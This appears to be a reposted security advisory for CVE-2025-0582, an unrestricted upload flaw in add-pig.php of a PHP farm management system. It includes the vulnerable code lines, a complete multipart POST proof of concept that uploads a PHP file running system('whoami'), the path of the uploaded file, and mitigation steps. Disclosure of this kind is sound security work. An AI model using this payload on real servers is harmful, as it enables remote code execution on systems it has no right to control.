CVE-2025-0582

发布于:2025-02-10 ⋅ 阅读:(38) ⋅ 点赞:(0)

Itsourcecode Farm Management System In PHP v1.0 add-pig.php Unrestricted Upload

NAME OF AFFECTED PRODUCT(S)

  • Farm Management System In PHP

AFFECTED AND/OR FIXED VERSION(S)

submitter

  • zzz,xiongbaojiang

Vulnerable File

  • add-pig.php

VERSION(S)

  • V1.0

PROBLEM TYPE

Vulnerability Type

  • Unrestricted Upload

Root Cause

In the add-pig.php file of the “Farm Management System In PHP” project, attackers can upload malicious code files through the parameter $res1_name. Due to the lack of proper validation and sanitation of the uploaded files, attackers are able to directly upload malicious files to the server, leading to the risk of arbitrary code execution.

Vulnerability Path

In the add-pig.php file of the “Farm Management System In PHP” project, attackers can upload malicious code files through the parameter $res1_name. Due to the lack of proper validation and sanitation of the uploaded files, attackers are able to directly upload malicious files to the server, leading to the risk of arbitrary code execution.

Key Parameter:

  • Parameter: $res1_name

  • File Name: farm management system/add-pig.php

  • Line Number: 37

    $res1_name = basename($_FILES['pigphoto']['name']);
    

File Upload:

  • Trigger Path: Arbitrary File Upload/Write

  • File Name: farm management system/add-pig.php

  • Line Number: 45

$move = move_uploaded_file($tmp_name, $location.$res1_name);

在这里插入图片描述

Vulnerability POC

POST /farm123/add-pig.php HTTP/1.1
Host: farm
Content-Type: multipart/form-data; boundary=---------------------------85676068117477891701865867569
Content-Length: 1468

-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigno"

pig-fms-2793
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="weight"

1
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="arrived"

2024-12-17
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="gender"

male
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="status"

active
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="breed"

23
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="remark"

1
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigphoto"; filename="test.php"
Content-Type: application/octet-stream

GIF89a;

<?php 
system('whoami');
?>
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="submit"


-----------------------------85676068117477891701865867569--

Payload:

-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigphoto"; filename="test.php"
Content-Type: application/octet-stream

GIF89a;

<?php 
system('whoami');
?>

The following are screenshots of some specific information obtained from testing and running with the yakit tool:

在这里插入图片描述
在这里插入图片描述

/uploadfolder/test.php

在这里插入图片描述

Recommendations for Vulnerability Mitigation

  1. File Type Validation: Limit the allowed file types (e.g., only allow image formats) before processing uploads.
  2. File Name Sanitization: Clean and rename uploaded files to avoid using user-provided names directly.
  3. Use Temporary Directory: Store uploaded files in a temporary directory and conduct security checks after processing.
  4. Permission Control: Ensure correct permission settings on the upload directory to prevent direct execution of uploaded files.
  5. Input Validation: Rigorously validate all user inputs to ensure security.

网站公告

今日签到

点亮在社区的每一天
去签到